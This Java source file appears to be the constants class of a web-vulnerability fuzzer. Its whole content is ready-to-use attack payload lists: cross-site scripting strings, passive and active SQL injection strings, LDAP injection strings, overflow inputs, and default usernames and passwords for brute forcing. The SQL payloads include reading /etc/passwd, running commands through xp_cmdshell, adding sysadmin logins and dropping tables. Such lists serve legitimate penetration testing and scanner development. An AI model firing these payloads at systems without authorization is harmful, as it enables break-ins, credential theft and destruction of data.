import java.util.HashMap;
import java.util.Map;
import java.util.Vector;


public final class Constants {
	
	public static final int UNAUTHORIZED_STATUS_CODE = 401;
	public static final int OK_STATUS_CODE = 200;
	
	public static final Vector<String> formMethods = new Vector<String>();
	static {
		formMethods.add("POST");
		formMethods.add("PUT");
		formMethods.add("GET");
		formMethods.add("DELETE");
	}
	
	public static final Vector<String> commonUsernames = new Vector<String>();
	static {
		commonUsernames.add("admin");
		commonUsernames.add("user");
		commonUsernames.add("root");
		commonUsernames.add("guest");
	}
		
	public static final Vector<String> commonPasswords = new Vector<String>();
	static {
		commonPasswords.add("password");
		commonPasswords.add("abc123");
		commonPasswords.add("abc1234");
		commonPasswords.add("qwerty");
		commonPasswords.add("root");
		commonPasswords.add("toor");
		commonPasswords.add("123456");
	}
	
	public static final Vector<String> commonPageNames = new Vector<String>();
	static {
		commonPageNames.add("admin");
		commonPageNames.add("conf");
		commonPageNames.add("config");
		commonPageNames.add("setup");
		commonPageNames.add("home");
		commonPageNames.add("password");
	}
	
	public static final Vector<String> commonPageExtensions = new Vector<String>();
	static {
		commonPageExtensions.add(".jsp");
		commonPageExtensions.add(".asp");
		commonPageExtensions.add(".html");
		commonPageExtensions.add(".htm");
	}
	
	public static final Vector<String> commonQueryNames = new Vector<String>();
	static {
		commonQueryNames.add("debug");
	}
	
	public static final Vector<String> commonQueryValues = new Vector<String>();
	static {
		commonQueryValues.add("true");
		commonQueryValues.add("false");
	}
	
	public static final Vector<String> bufferOverflowVector = new Vector<String>();
	static {
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 0));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 5));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 17));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 33));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 65));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 129));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 257));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 513));
		bufferOverflowVector.add(org.apache.commons.lang.StringUtils.repeat("A", 1024));
		
		// adding these strings causes the application to crash when trying to
		// load them for use
		
//		bufferOverFlow.add(org.apache.commons.lang.StringUtils.repeat("A", 2049));
//		bufferOverFlow.add(org.apache.commons.lang.StringUtils.repeat("A", 4097));
//		bufferOverFlow.add(org.apache.commons.lang.StringUtils.repeat("A", 8193));
//		bufferOverFlow.add(org.apache.commons.lang.StringUtils.repeat("A", 12288));
	}
	
	public static final Vector<String> integerOverflowVector = new Vector<String>();
	static {
		integerOverflowVector.add(Integer.toString(-1));
		integerOverflowVector.add(Integer.toString(0));
		integerOverflowVector.add(Integer.toString(0x100));
		integerOverflowVector.add(Integer.toString(0x1000));
		integerOverflowVector.add(Integer.toString(0x3fffffff));
		integerOverflowVector.add(Integer.toString(0x7ffffffe));
		integerOverflowVector.add(Integer.toString(0x7fffffff));
		integerOverflowVector.add(Integer.toString(0x80000000));
		integerOverflowVector.add(Integer.toString(0xfffffffe));
		integerOverflowVector.add(Integer.toString(0xffffffff));
		integerOverflowVector.add(Integer.toString(0x10000));
		integerOverflowVector.add(Integer.toString(0x100000));
	}
	
	public static final Vector<String> crossSiteScriptingVector = new Vector<String>();
	static {
		crossSiteScriptingVector.add(">\"><script>alert(\"XSS\")</script>&<!--@>");
		crossSiteScriptingVector.add(">\"><script>alert(\"XSS\")</script>&");
		crossSiteScriptingVector.add("\"><STYLE>@import\"javascript:alert('XSS')\";</STYLE>");
		crossSiteScriptingVector.add(">\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>");
		crossSiteScriptingVector.add(">%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>");
		crossSiteScriptingVector.add("'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'");
		crossSiteScriptingVector.add("\">");
		crossSiteScriptingVector.add(">\"");
		crossSiteScriptingVector.add("'';!--\"<XSS>=&{()}");
		crossSiteScriptingVector.add("<IMG SRC=\"javascript:alert('XSS');\">");
		crossSiteScriptingVector.add("<IMG SRC=javascript:alert('XSS')>");
		crossSiteScriptingVector.add("<IMG SRC=JaVaScRiPt:alert('XSS')>");
		crossSiteScriptingVector.add("<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>");
		crossSiteScriptingVector.add("<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>");
		crossSiteScriptingVector.add("<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>");
		crossSiteScriptingVector.add("<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>");
		crossSiteScriptingVector.add("<IMG SRC=\"jav&#x09;ascript:alert(<WBR>'XSS');\">");
		crossSiteScriptingVector.add("<IMG SRC=\"jav&#x0A;ascript:alert(<WBR>'XSS');\">");
		crossSiteScriptingVector.add("<IMG SRC=\"jav&#x0D;ascript:alert(<WBR>'XSS');\">");
	}
	
	public static final Vector<String> passiveSQLInjectionVector = new Vector<String>();
	static {
		passiveSQLInjectionVector.add("'||(elt(-3+5,bin(15),ord(10),hex(char(45))))");
		passiveSQLInjectionVector.add("||6");
		passiveSQLInjectionVector.add("'||'6");
		passiveSQLInjectionVector.add("(||6)");
		passiveSQLInjectionVector.add("' OR 1=1-- ");
		passiveSQLInjectionVector.add("OR 1=1");
		passiveSQLInjectionVector.add("' OR '1'='1");
		passiveSQLInjectionVector.add("; OR '1'='1'");
		passiveSQLInjectionVector.add("' OR userid=1); --");
		passiveSQLInjectionVector.add("' OR userid=2); --");
		passiveSQLInjectionVector.add("' OR userid=3); --");
		passiveSQLInjectionVector.add("%22+or+isnull%281%2F0%29+%2F*");
		passiveSQLInjectionVector.add("%27+OR+%277659%27%3D%277659");
		passiveSQLInjectionVector.add("%22+or+isnull%281%2F0%29+%2F*");
		passiveSQLInjectionVector.add("%27+--+");
		passiveSQLInjectionVector.add("' or 1=1--");
		passiveSQLInjectionVector.add("\" or 1=1--");
		passiveSQLInjectionVector.add("' or 1=1 /*");
		passiveSQLInjectionVector.add("or 1=1--");
		passiveSQLInjectionVector.add("' or 'a'='a");
		passiveSQLInjectionVector.add("\" or \"a\"=\"a");
		passiveSQLInjectionVector.add("') or ('a'='a");
		passiveSQLInjectionVector.add("' OR 1=1); --");
		passiveSQLInjectionVector.add("Admin' OR '");
		passiveSQLInjectionVector.add("'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--");
		passiveSQLInjectionVector.add(") UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;");
		passiveSQLInjectionVector.add("' having 1=1--");
		passiveSQLInjectionVector.add("' group by userid having 1=1--");
		passiveSQLInjectionVector.add("' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--");
		passiveSQLInjectionVector.add("' or 1 in (select @@version)--");
		passiveSQLInjectionVector.add("' union all select @@version--");
		passiveSQLInjectionVector.add("' OR 'unusual' = 'unusual'");
		passiveSQLInjectionVector.add("' OR 'something' = 'some'+'thing'");
		passiveSQLInjectionVector.add("' OR 'text' = N'text'");
		passiveSQLInjectionVector.add("' OR 'something' like 'some%'");
		passiveSQLInjectionVector.add("' OR 2 > 1");
		passiveSQLInjectionVector.add("' OR 'text' > 't'");
		passiveSQLInjectionVector.add("' OR 'whatever' in ('whatever')");
		passiveSQLInjectionVector.add("' OR 2 BETWEEN 1 and 3");
		passiveSQLInjectionVector.add("' or username like char(37);");
		passiveSQLInjectionVector.add("' union select * from users where login = char(114,111,111,116);");
		passiveSQLInjectionVector.add("' union select");
		passiveSQLInjectionVector.add("Password:*/=1--");
		passiveSQLInjectionVector.add("UNI/**/ON SEL/**/ECT");
		passiveSQLInjectionVector.add("'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'");
		passiveSQLInjectionVector.add("'; EXEC ('SEL' + 'ECT US' + 'ER')");
		passiveSQLInjectionVector.add("'/**/OR/**/1/**/=/**/1");
		passiveSQLInjectionVector.add("' or 1/*");
		passiveSQLInjectionVector.add("+or+isnull%281%2F0%29+%2F*");
		passiveSQLInjectionVector.add("%27+OR+%277659%27%3D%277659");
		passiveSQLInjectionVector.add("%22+or+isnull%281%2F0%29+%2F*");
		passiveSQLInjectionVector.add("%27+--+&password=");
		passiveSQLInjectionVector.add("'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --");
		passiveSQLInjectionVector.add("' and 1 in (select var from temp)--");
		passiveSQLInjectionVector.add("' union select 1,load_file('/etc/passwd'),1,1,1;");
		passiveSQLInjectionVector.add("1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;");
		passiveSQLInjectionVector.add("' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));");
	}
	
	public static final Vector<String> ldapAuthenticationVector = new Vector<String>();
	static {
		ldapAuthenticationVector.add("|");
		ldapAuthenticationVector.add("!");
		ldapAuthenticationVector.add("(");
		ldapAuthenticationVector.add(")");
		ldapAuthenticationVector.add("%28");
		ldapAuthenticationVector.add("%29");
		ldapAuthenticationVector.add("&");
		ldapAuthenticationVector.add("%26");
		ldapAuthenticationVector.add("%21");
		ldapAuthenticationVector.add("%7C");
		ldapAuthenticationVector.add("*|");
		ldapAuthenticationVector.add("%2A%7C");
		ldapAuthenticationVector.add("*(|(mail=*))");
		ldapAuthenticationVector.add("%2A%28%7C%28mail%3D%2A%29%29");
		ldapAuthenticationVector.add("*(|(objectclass=*))");
		ldapAuthenticationVector.add("%2A%28%7C%28objectclass%3D%2A%29%29");
		ldapAuthenticationVector.add("*()|%26'");
		ldapAuthenticationVector.add("admin*");
		ldapAuthenticationVector.add("admin*)((|userPassword=*)");
		ldapAuthenticationVector.add("*)(uid=*))(|(uid=*");
	}
	
	public static final Vector<String> activeSQLInjectionVector = new Vector<String>();
	static {
		activeSQLInjectionVector.add("'; exec master..xp_cmdshell 'ping 10.10.1.2'--");
		activeSQLInjectionVector.add("CREATE USER name IDENTIFIED BY 'pass123'");
		activeSQLInjectionVector.add("CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;");
		activeSQLInjectionVector.add("' ; drop table temp --");
		activeSQLInjectionVector.add("exec sp_addlogin 'name' , 'password'");
		activeSQLInjectionVector.add("exec sp_addsrvrolemember 'name' , 'sysadmin'");
		activeSQLInjectionVector.add("INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))");
		activeSQLInjectionVector.add("GRANT CONNECT TO name; GRANT RESOURCE TO name;");
		activeSQLInjectionVector.add("INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)");
	}
	
	public static final Map<String, Vector<String>> fuzzVectorCollection = new HashMap<String, Vector<String>>();
	static {
		fuzzVectorCollection.put("Buffer Overflow Attack", bufferOverflowVector);
		fuzzVectorCollection.put("Integer Overflow Attack", integerOverflowVector);
		fuzzVectorCollection.put("Cross Site Scripting Attack", crossSiteScriptingVector);
		fuzzVectorCollection.put("Passive SQL Injection Attack", passiveSQLInjectionVector);
		fuzzVectorCollection.put("Active SQL Injection Attack", activeSQLInjectionVector);
		fuzzVectorCollection.put("LDAP Authentication Attack", ldapAuthenticationVector);
		fuzzVectorCollection.put("Common User Names", commonUsernames);
		fuzzVectorCollection.put("Common Passwords", commonPasswords);
	}
	
}
